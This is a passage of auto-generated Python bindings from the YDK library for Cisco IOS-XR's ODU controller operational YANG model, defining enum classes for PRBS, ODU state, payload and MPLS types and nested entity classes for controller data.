from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduPerMon']
class OduPmCaEt(Enum):
"""
OduPmCaEt (Enum Class)
Odu pm ca et
.. data:: disable = 0
Disable
.. data:: enable = 1
Enable
"""
disable = Enum.YLeaf(0, "disable")
enable = Enum.YLeaf(1, "enable")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduPmCaEt']
class OduPmMode(Enum):
"""
OduPmMode (Enum Class)
Odu pm mode
.. data:: nim = 0
Non-Intrusive Monitor
.. data:: oper = 1
Operational
"""
nim = Enum.YLeaf(0, "nim")
oper = Enum.YLeaf(1, "oper")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduPmMode']
class OduPrbsMode(Enum):
"""
OduPrbsMode (Enum Class)
Odu prbs mode
.. data:: invalid = 0
invalid
.. data:: source = 1
Source
.. data:: sink = 2
Sink
.. data:: source_sink = 3
Source Sink
"""
invalid = Enum.YLeaf(0, "invalid")
source = Enum.YLeaf(1, "source")
sink = Enum.YLeaf(2, "sink")
source_sink = Enum.YLeaf(3, "source-sink")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduPrbsMode']
class OduPrbsPattern(Enum):
"""
OduPrbsPattern (Enum Class)
Odu prbs pattern
.. data:: pn_none = 0
PNNONE
.. data:: pn31 = 1
PN31
.. data:: pn23 = 2
PN23
.. data:: pn11 = 4
PN11
.. data:: inverted_pn31 = 8
INVERTED PN31
.. data:: inverted_pn11 = 16
INVERTED PN11
"""
pn_none = Enum.YLeaf(0, "pn-none")
pn31 = Enum.YLeaf(1, "pn31")
pn23 = Enum.YLeaf(2, "pn23")
pn11 = Enum.YLeaf(4, "pn11")
inverted_pn31 = Enum.YLeaf(8, "inverted-pn31")
inverted_pn11 = Enum.YLeaf(16, "inverted-pn11")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduPrbsPattern']
class OduPrbsStatus(Enum):
"""
OduPrbsStatus (Enum Class)
Odu prbs status
.. data:: locked = 0
Locked
.. data:: unlocked = 1
Unlocked
.. data:: not_applicable = 2
Not Applicable
"""
locked = Enum.YLeaf(0, "locked")
unlocked = Enum.YLeaf(1, "unlocked")
not_applicable = Enum.YLeaf(2, "not-applicable")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduPrbsStatus']
class OduPrbsTest(Enum):
"""
OduPrbsTest (Enum Class)
Odu prbs test
.. data:: disable = 0
Disable
.. data:: enable = 1
Enable
"""
disable = Enum.YLeaf(0, "disable")
enable = Enum.YLeaf(1, "enable")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduPrbsTest']
class OduPtTypeEt(Enum):
"""
OduPtTypeEt (Enum Class)
Odu pt type et
.. data:: na = 0
NA
.. data:: two_asynchronous_cbr_mapping = 2
02 (Asynchronous CBR mapping)
.. data:: three_bit_synchronous_cbr_mapping = 3
03 (Bit synchronous CBR mapping)
.. data:: five_gfp_mapping = 5
05 (GFP mapping)
.. data:: six_virtual_concatenated_signal = 6
06 (Virtual Concatenated Signal)
.. data:: seven_pcs_codeword_transparent_ethernet_mapping = 7
07 (PCS codeword transparent Ethernet mapping)
.. data:: nine_gfp_mapping_into_opu2 = 9
09 (GFP mapping into OPU2)
.. data:: zero_astm1_mapping_into_opu0 = 10
0A (STM1 mapping into OPU0)
.. data:: zero_bstm4_mapping_into_opu0 = 11
0B (STM4 mapping into OPU0)
.. data:: twenty_odu_multiplex_structure_supporting_odt_ujk = 32
20 (ODU multiplex structure supporting ODTUjk)
.. data:: twenty_one_odu_multiplex_structure_supporting_odt_ujk_and_odt_ukts = 33
21 (ODU multiplex structure supporting ODTUjk
and ODTUk.ts)
"""
na = Enum.YLeaf(0, "na")
two_asynchronous_cbr_mapping = Enum.YLeaf(2, "two-asynchronous-cbr-mapping")
three_bit_synchronous_cbr_mapping = Enum.YLeaf(3, "three-bit-synchronous-cbr-mapping")
five_gfp_mapping = Enum.YLeaf(5, "five-gfp-mapping")
six_virtual_concatenated_signal = Enum.YLeaf(6, "six-virtual-concatenated-signal")
seven_pcs_codeword_transparent_ethernet_mapping = Enum.YLeaf(7, "seven-pcs-codeword-transparent-ethernet-mapping")
nine_gfp_mapping_into_opu2 = Enum.YLeaf(9, "nine-gfp-mapping-into-opu2")
zero_astm1_mapping_into_opu0 = Enum.YLeaf(10, "zero-astm1-mapping-into-opu0")
zero_bstm4_mapping_into_opu0 = Enum.YLeaf(11, "zero-bstm4-mapping-into-opu0")
twenty_odu_multiplex_structure_supporting_odt_ujk = Enum.YLeaf(32, "twenty-odu-multiplex-structure-supporting-odt-ujk")
twenty_one_odu_multiplex_structure_supporting_odt_ujk_and_odt_ukts = Enum.YLeaf(33, "twenty-one-odu-multiplex-structure-supporting-odt-ujk-and-odt-ukts")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduPtTypeEt']
class OduResourceEt(Enum):
"""
OduResourceEt (Enum Class)
Odu resource et
.. data:: resource_free = 0
ODU Resource Free
.. data:: open_connection = 1
ODU Open Connection
.. data:: cross_connection = 2
ODU Cross Connection
.. data:: channelized = 3
ODU Channelized
.. data:: loopbacked = 4
ODU Loopbacked
.. data:: cross_connected_and_loopbacked = 5
ODU Cross Connection and Loopbacked
.. data:: terminated = 6
ODU Terminated
.. data:: invalid = 7
ODU Invalid
"""
resource_free = Enum.YLeaf(0, "resource-free")
open_connection = Enum.YLeaf(1, "open-connection")
cross_connection = Enum.YLeaf(2, "cross-connection")
channelized = Enum.YLeaf(3, "channelized")
loopbacked = Enum.YLeaf(4, "loopbacked")
cross_connected_and_loopbacked = Enum.YLeaf(5, "cross-connected-and-loopbacked")
terminated = Enum.YLeaf(6, "terminated")
invalid = Enum.YLeaf(7, "invalid")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduResourceEt']
class OduSecState(Enum):
"""
OduSecState (Enum Class)
Odu sec state
.. data:: normal = 0
Normal
.. data:: maintenance = 1
Maintenance
.. data:: ains = 2
Automatic In Service
"""
normal = Enum.YLeaf(0, "normal")
maintenance = Enum.YLeaf(1, "maintenance")
ains = Enum.YLeaf(2, "ains")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduSecState']
class OduStateEt(Enum):
"""
OduStateEt (Enum Class)
Odu state et
.. data:: not_ready = 0
Not Ready
.. data:: admin_down = 1
Admin Down
.. data:: down = 2
Down
.. data:: up = 3
Up
.. data:: shutdown = 4
Shutdown
.. data:: error_disable = 5
Error Disable
.. data:: down_immediate = 6
Down Immediate
.. data:: down_immediate_admin = 7
Down Immediate Admin
.. data:: down_graceful = 8
Down Graceful
.. data:: begin_shutdown = 9
Begin Shutdown
.. data:: end_shutdown = 10
End Shutdown
.. data:: begin_error_disable = 11
Begin Error Disable
.. data:: end_error_disable = 12
End Error Disable
.. data:: begin_down_graceful = 13
Begin Down Graceful
.. data:: reset = 14
Reset
.. data:: operational = 15
Operational
.. data:: not_operational = 16
Not Operational
.. data:: unknown = 17
Unknown
.. data:: last = 18
Last
"""
not_ready = Enum.YLeaf(0, "not-ready")
admin_down = Enum.YLeaf(1, "admin-down")
down = Enum.YLeaf(2, "down")
up = Enum.YLeaf(3, "up")
shutdown = Enum.YLeaf(4, "shutdown")
error_disable = Enum.YLeaf(5, "error-disable")
down_immediate = Enum.YLeaf(6, "down-immediate")
down_immediate_admin = Enum.YLeaf(7, "down-immediate-admin")
down_graceful = Enum.YLeaf(8, "down-graceful")
begin_shutdown = Enum.YLeaf(9, "begin-shutdown")
end_shutdown = Enum.YLeaf(10, "end-shutdown")
begin_error_disable = Enum.YLeaf(11, "begin-error-disable")
end_error_disable = Enum.YLeaf(12, "end-error-disable")
begin_down_graceful = Enum.YLeaf(13, "begin-down-graceful")
reset = Enum.YLeaf(14, "reset")
operational = Enum.YLeaf(15, "operational")
not_operational = Enum.YLeaf(16, "not-operational")
unknown = Enum.YLeaf(17, "unknown")
last = Enum.YLeaf(18, "last")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduStateEt']
class OduTcmMode(Enum):
"""
OduTcmMode (Enum Class)
Odu tcm mode
.. data:: odu_tcm_mode_trans_parent = 0
Transparent
.. data:: nim = 1
Non-Intrusive Monitor
.. data:: oper = 2
Operational
"""
odu_tcm_mode_trans_parent = Enum.YLeaf(0, "odu-tcm-mode-trans-parent")
nim = Enum.YLeaf(1, "nim")
oper = Enum.YLeaf(2, "oper")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduTcmMode']
class OduTcmPerMon(Enum):
"""
OduTcmPerMon (Enum Class)
Odu tcm per mon
.. data:: disable = 0
Disable
.. data:: enable = 1
Enable
"""
disable = Enum.YLeaf(0, "disable")
enable = Enum.YLeaf(1, "enable")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduTcmPerMon']
class OduTcmStateEt(Enum):
"""
OduTcmStateEt (Enum Class)
Odu tcm state et
.. data:: disable = 0
Disable
.. data:: enable = 1
Enable
"""
disable = Enum.YLeaf(0, "disable")
enable = Enum.YLeaf(1, "enable")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduTcmStateEt']
class OduTsGEt(Enum):
"""
OduTsGEt (Enum Class)
Odu ts g et
.. data:: one_dot_two_five_g = 0
1.25G
.. data:: two_dot_five_g = 1
2.5G
.. data:: tsg_not_applicable = 2
NA
"""
one_dot_two_five_g = Enum.YLeaf(0, "one-dot-two-five-g")
two_dot_five_g = Enum.YLeaf(1, "two-dot-five-g")
tsg_not_applicable = Enum.YLeaf(2, "tsg-not-applicable")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduTsGEt']
class OduTtiEt(Enum):
"""
OduTtiEt (Enum Class)
Odu tti et
.. data:: ascii = 0
ASCII
.. data:: hex = 1
HEX
.. data:: full_ascii = 2
FULL ASCII
.. data:: full_hex = 3
FULL HEX
"""
ascii = Enum.YLeaf(0, "ascii")
hex = Enum.YLeaf(1, "hex")
full_ascii = Enum.YLeaf(2, "full-ascii")
full_hex = Enum.YLeaf(3, "full-hex")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduTtiEt']
class OduUserEt(Enum):
"""
OduUserEt (Enum Class)
Odu user et
.. data:: mp = 0
MP
.. data:: gmpls = 1
GMPLS
.. data:: all = 2
All
"""
mp = Enum.YLeaf(0, "mp")
gmpls = Enum.YLeaf(1, "gmpls")
all = Enum.YLeaf(2, "all")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OduUserEt']
class OtmMplsLibC(Enum):
"""
OtmMplsLibC (Enum Class)
Otm mpls lib c
.. data:: otm_mpls_lib_c_type_null = 0
NULL
.. data:: otm_mpls_lib_c_type_ipv4 = 1
IPV4
.. data:: otm_mpls_lib_c_type_ipv4_p2p_tunnel = 7
IPV4 P2P TUNNEL
.. data:: otm_mpls_lib_c_type_ipv6_p2p_tunnel = 8
IPV6 P2P TUNNEL
.. data:: otm_mpls_lib_c_type_ipv4_uni = 9
IPV4 UNI
.. data:: otm_mpls_lib_c_type_ipv4_p2mp_tunnel = 13
IPV4 P2MP TUNNEL
.. data:: otm_mpls_lib_c_type_ipv6_p2mp_tunnel = 14
IPV6 P2MP TUNNEL
.. data:: otm_mpls_lib_c_type_ipv4_tp_tunnel = 15
IPV4 TP TUNNEL
.. data:: otm_mpls_lib_c_type_ipv6_tp_tunnel = 16
IPV6 TP TUNNEL
"""
otm_mpls_lib_c_type_null = Enum.YLeaf(0, "otm-mpls-lib-c-type-null")
otm_mpls_lib_c_type_ipv4 = Enum.YLeaf(1, "otm-mpls-lib-c-type-ipv4")
otm_mpls_lib_c_type_ipv4_p2p_tunnel = Enum.YLeaf(7, "otm-mpls-lib-c-type-ipv4-p2p-tunnel")
otm_mpls_lib_c_type_ipv6_p2p_tunnel = Enum.YLeaf(8, "otm-mpls-lib-c-type-ipv6-p2p-tunnel")
otm_mpls_lib_c_type_ipv4_uni = Enum.YLeaf(9, "otm-mpls-lib-c-type-ipv4-uni")
otm_mpls_lib_c_type_ipv4_p2mp_tunnel = Enum.YLeaf(13, "otm-mpls-lib-c-type-ipv4-p2mp-tunnel")
otm_mpls_lib_c_type_ipv6_p2mp_tunnel = Enum.YLeaf(14, "otm-mpls-lib-c-type-ipv6-p2mp-tunnel")
otm_mpls_lib_c_type_ipv4_tp_tunnel = Enum.YLeaf(15, "otm-mpls-lib-c-type-ipv4-tp-tunnel")
otm_mpls_lib_c_type_ipv6_tp_tunnel = Enum.YLeaf(16, "otm-mpls-lib-c-type-ipv6-tp-tunnel")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OtmMplsLibC']
class OtmOpticalRmCtxt(Enum):
"""
OtmOpticalRmCtxt (Enum Class)
Otm optical rm ctxt
.. data:: otm_opt_rm_ctxt_type_none = 0
NONE
.. data:: otm_opt_rm_ctxt_type_down_stream_rw_add = 1
DOWNSTREAM RW ADD
.. data:: otm_opt_rm_ctxt_type_up_stream_rw_add = 2
UPSTREAM RW ADD
.. data:: otm_opt_rm_ctxt_type_down_stream_rw_del = 3
DOWNSTREAM RW DEL
.. data:: otm_opt_rm_ctxt_type_up_stream_rw_del = 4
UPSTREAM RW DEL
.. data:: otm_opt_rm_ctxt_type_down_stream_lbl_get = 5
DOWNSTREAM LBL GET
.. data:: otm_opt_rm_ctxt_type_up_stream_lbl_get = 6
UPSTREAM LBL GET
.. data:: otm_opt_rm_ctxt_type_down_stream_lbl_rel = 7
DOWNSTREAM LBL REL
.. data:: otm_opt_rm_ctxt_type_up_stream_lbl_rel = 8
UPSTREAM LBL REL
.. data:: otm_opt_rm_ctxt_type_end_point_rw_add = 9
ENDPOINT RW ADD
.. data:: otm_opt_rm_ctxt_type_end_point_rw_del = 10
ENDPOINT RW DEL
.. data:: otm_opt_rm_ctxt_type_odu_group_add = 11
ODU GROUP ADD
.. data:: otm_opt_rm_ctxt_type_odu_group_del = 12
ODU GROUP DEL
.. data:: otm_optical_rm_ctxt_type_last = 13
LAST
"""
otm_opt_rm_ctxt_type_none = Enum.YLeaf(0, "otm-opt-rm-ctxt-type-none")
otm_opt_rm_ctxt_type_down_stream_rw_add = Enum.YLeaf(1, "otm-opt-rm-ctxt-type-down-stream-rw-add")
otm_opt_rm_ctxt_type_up_stream_rw_add = Enum.YLeaf(2, "otm-opt-rm-ctxt-type-up-stream-rw-add")
otm_opt_rm_ctxt_type_down_stream_rw_del = Enum.YLeaf(3, "otm-opt-rm-ctxt-type-down-stream-rw-del")
otm_opt_rm_ctxt_type_up_stream_rw_del = Enum.YLeaf(4, "otm-opt-rm-ctxt-type-up-stream-rw-del")
otm_opt_rm_ctxt_type_down_stream_lbl_get = Enum.YLeaf(5, "otm-opt-rm-ctxt-type-down-stream-lbl-get")
otm_opt_rm_ctxt_type_up_stream_lbl_get = Enum.YLeaf(6, "otm-opt-rm-ctxt-type-up-stream-lbl-get")
otm_opt_rm_ctxt_type_down_stream_lbl_rel = Enum.YLeaf(7, "otm-opt-rm-ctxt-type-down-stream-lbl-rel")
otm_opt_rm_ctxt_type_up_stream_lbl_rel = Enum.YLeaf(8, "otm-opt-rm-ctxt-type-up-stream-lbl-rel")
otm_opt_rm_ctxt_type_end_point_rw_add = Enum.YLeaf(9, "otm-opt-rm-ctxt-type-end-point-rw-add")
otm_opt_rm_ctxt_type_end_point_rw_del = Enum.YLeaf(10, "otm-opt-rm-ctxt-type-end-point-rw-del")
otm_opt_rm_ctxt_type_odu_group_add = Enum.YLeaf(11, "otm-opt-rm-ctxt-type-odu-group-add")
otm_opt_rm_ctxt_type_odu_group_del = Enum.YLeaf(12, "otm-opt-rm-ctxt-type-odu-group-del")
otm_optical_rm_ctxt_type_last = Enum.YLeaf(13, "otm-optical-rm-ctxt-type-last")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OtmOpticalRmCtxt']
class OtmOpticalRmCtxtRm(Enum):
"""
OtmOpticalRmCtxtRm (Enum Class)
Otm optical rm ctxt rm
.. data:: otm_opt_rm_ctxt_rm_none = 0
NONE
.. data:: otm_opt_rm_ctxt_rm_wdm = 1
WDM
.. data:: otm_opt_rm_ctxt_rm_fsc = 2
FSC
.. data:: otm_opt_rm_ctxt_rm_tdm = 3
TDM
.. data:: otm_opt_rm_ctxt_rm_g709_otn = 4
G709 OTN
.. data:: otm_optical_rm_ctxt_rm_last = 5
LAST
"""
otm_opt_rm_ctxt_rm_none = Enum.YLeaf(0, "otm-opt-rm-ctxt-rm-none")
otm_opt_rm_ctxt_rm_wdm = Enum.YLeaf(1, "otm-opt-rm-ctxt-rm-wdm")
otm_opt_rm_ctxt_rm_fsc = Enum.YLeaf(2, "otm-opt-rm-ctxt-rm-fsc")
otm_opt_rm_ctxt_rm_tdm = Enum.YLeaf(3, "otm-opt-rm-ctxt-rm-tdm")
otm_opt_rm_ctxt_rm_g709_otn = Enum.YLeaf(4, "otm-opt-rm-ctxt-rm-g709-otn")
otm_optical_rm_ctxt_rm_last = Enum.YLeaf(5, "otm-optical-rm-ctxt-rm-last")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OtmOpticalRmCtxtRm']
class OtmTeTunnelInfo(Enum):
"""
OtmTeTunnelInfo (Enum Class)
Otm te tunnel info
.. data:: otm_te_info_none = 0
NONE
.. data:: otm_te_info_s2l = 1
S2L
.. data:: otm_te_info_tunnel_id = 2
ID
.. data:: otm_te_info_passive_match = 3
MAT
"""
otm_te_info_none = Enum.YLeaf(0, "otm-te-info-none")
otm_te_info_s2l = Enum.YLeaf(1, "otm-te-info-s2l")
otm_te_info_tunnel_id = Enum.YLeaf(2, "otm-te-info-tunnel-id")
otm_te_info_passive_match = Enum.YLeaf(3, "otm-te-info-passive-match")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['OtmTeTunnelInfo']
class Odu(_Entity_):
"""
ODU operational data
.. attribute:: controllers
All ODU Port operational data
**type**\: :py:class:`Controllers <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu, self).__init__()
self._top_entity = None
self.yang_name = "odu"
self.yang_parent_name = "Cisco-IOS-XR-controller-odu-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("controllers", ("controllers", Odu.Controllers))])
self._leafs = OrderedDict()
self.controllers = Odu.Controllers()
self.controllers.parent = self
self._children_name_map["controllers"] = "controllers"
self._segment_path = lambda: "Cisco-IOS-XR-controller-odu-oper:odu"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu, [], name, value)
class Controllers(_Entity_):
"""
All ODU Port operational data
.. attribute:: controller
ODU Port operational data
**type**\: list of :py:class:`Controller <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers, self).__init__()
self.yang_name = "controllers"
self.yang_parent_name = "odu"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("controller", ("controller", Odu.Controllers.Controller))])
self._leafs = OrderedDict()
self.controller = YList(self)
self._segment_path = lambda: "controllers"
self._absolute_path = lambda: "Cisco-IOS-XR-controller-odu-oper:odu/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers, [], name, value)
class Controller(_Entity_):
"""
ODU Port operational data
.. attribute:: controller_name (key)
Port name
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
**config**\: False
.. attribute:: prbs
ODU port operational data
**type**\: :py:class:`Prbs <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Prbs>`
**config**\: False
.. attribute:: info
ODU port operational data
**type**\: :py:class:`Info <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller, self).__init__()
self.yang_name = "controller"
self.yang_parent_name = "controllers"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['controller_name']
self._child_classes = OrderedDict([("prbs", ("prbs", Odu.Controllers.Controller.Prbs)), ("info", ("info", Odu.Controllers.Controller.Info))])
self._leafs = OrderedDict([
('controller_name', (YLeaf(YType.str, 'controller-name'), ['str'])),
])
self.controller_name = None
self.prbs = Odu.Controllers.Controller.Prbs()
self.prbs.parent = self
self._children_name_map["prbs"] = "prbs"
self.info = Odu.Controllers.Controller.Info()
self.info.parent = self
self._children_name_map["info"] = "info"
self._segment_path = lambda: "controller" + "[controller-name='" + str(self.controller_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-controller-odu-oper:odu/controllers/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller, ['controller_name'], name, value)
class Prbs(_Entity_):
"""
ODU port operational data
.. attribute:: odu_prbs_test
odu prbs test
**type**\: :py:class:`OduPrbsTest <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPrbsTest>`
**config**\: False
.. attribute:: odu_prbs_mode
odu prbs mode
**type**\: :py:class:`OduPrbsMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPrbsMode>`
**config**\: False
.. attribute:: odu_prbs_pattern
odu prbs pattern
**type**\: :py:class:`OduPrbsPattern <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPrbsPattern>`
**config**\: False
.. attribute:: odu_prbs_status
odu prbs status
**type**\: :py:class:`OduPrbsStatus <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPrbsStatus>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Prbs, self).__init__()
self.yang_name = "prbs"
self.yang_parent_name = "controller"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('odu_prbs_test', (YLeaf(YType.enumeration, 'odu-prbs-test'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPrbsTest', '')])),
('odu_prbs_mode', (YLeaf(YType.enumeration, 'odu-prbs-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPrbsMode', '')])),
('odu_prbs_pattern', (YLeaf(YType.enumeration, 'odu-prbs-pattern'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPrbsPattern', '')])),
('odu_prbs_status', (YLeaf(YType.enumeration, 'odu-prbs-status'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPrbsStatus', '')])),
])
self.odu_prbs_test = None
self.odu_prbs_mode = None
self.odu_prbs_pattern = None
self.odu_prbs_status = None
self._segment_path = lambda: "prbs"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Prbs, ['odu_prbs_test', 'odu_prbs_mode', 'odu_prbs_pattern', 'odu_prbs_status'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Prbs']['meta_info']
class Info(_Entity_):
"""
ODU port operational data
.. attribute:: local
TTI
**type**\: :py:class:`Local <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Local>`
**config**\: False
.. attribute:: remote
Remote
**type**\: :py:class:`Remote <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Remote>`
**config**\: False
.. attribute:: tti_mode
TTI
**type**\: :py:class:`TtiMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TtiMode>`
**config**\: False
.. attribute:: odu_fwd_ref
ODU fwd\_ref
**type**\: :py:class:`OduFwdRef <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.OduFwdRef>`
**config**\: False
.. attribute:: alarm
Alarm
**type**\: :py:class:`Alarm <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm>`
**config**\: False
.. attribute:: te_ctx_data
Label Get Data
**type**\: :py:class:`TeCtxData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TeCtxData>`
**config**\: False
.. attribute:: xc_add_ctx_data
Xconnect Add Data
**type**\: :py:class:`XcAddCtxData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcAddCtxData>`
**config**\: False
.. attribute:: xc_rem_ctx_data
Xconnect Remove Data
**type**\: :py:class:`XcRemCtxData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.XcRemCtxData>`
**config**\: False
.. attribute:: odu_delay
ODU Delay
**type**\: :py:class:`OduDelay <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.OduDelay>`
**config**\: False
.. attribute:: odu_terminate_ether
odu terminate ether
**type**\: :py:class:`OduTerminateEther <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.OduTerminateEther>`
**config**\: False
.. attribute:: ains_info
AINS information
**type**\: :py:class:`AinsInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.AinsInfo>`
**config**\: False
.. attribute:: state
Admin State
**type**\: :py:class:`OduStateEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduStateEt>`
**config**\: False
.. attribute:: sf
SF in the form of 1.0E \- <SF>
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: sd
SD in the form of 1.0E \- <SD>
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: loopback_mode
Loopback
**type**\: :py:class:`OduLoopBackMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduLoopBackMode>`
**config**\: False
.. attribute:: derived_mode
Derived State
**type**\: :py:class:`OduDerState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduDerState>`
**config**\: False
.. attribute:: inherit_sec_state
Sec State
**type**\: :py:class:`OduSecState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduSecState>`
**config**\: False
.. attribute:: config_sec_state
Sec State
**type**\: :py:class:`OduSecState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduSecState>`
**config**\: False
.. attribute:: gcc_mode
ODU GCC
**type**\: bool
**config**\: False
.. attribute:: child_name
Child Name
**type**\: str
**length:** 0..64
**config**\: False
.. attribute:: max_odu_child
ODU maximum no of children
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: od_uuser
ODU User
**type**\: :py:class:`OduUserEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduUserEt>`
**config**\: False
.. attribute:: resource_state
Resource State
**type**\: :py:class:`OduResourceEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduResourceEt>`
**config**\: False
.. attribute:: pt_type
PT type
**type**\: :py:class:`OduPtTypeEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPtTypeEt>`
**config**\: False
.. attribute:: flex_type
FLEX type
**type**\: :py:class:`OduFlexTypeEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduFlexTypeEt>`
**config**\: False
.. attribute:: flex_bw
FLEX bw
**type**\: int
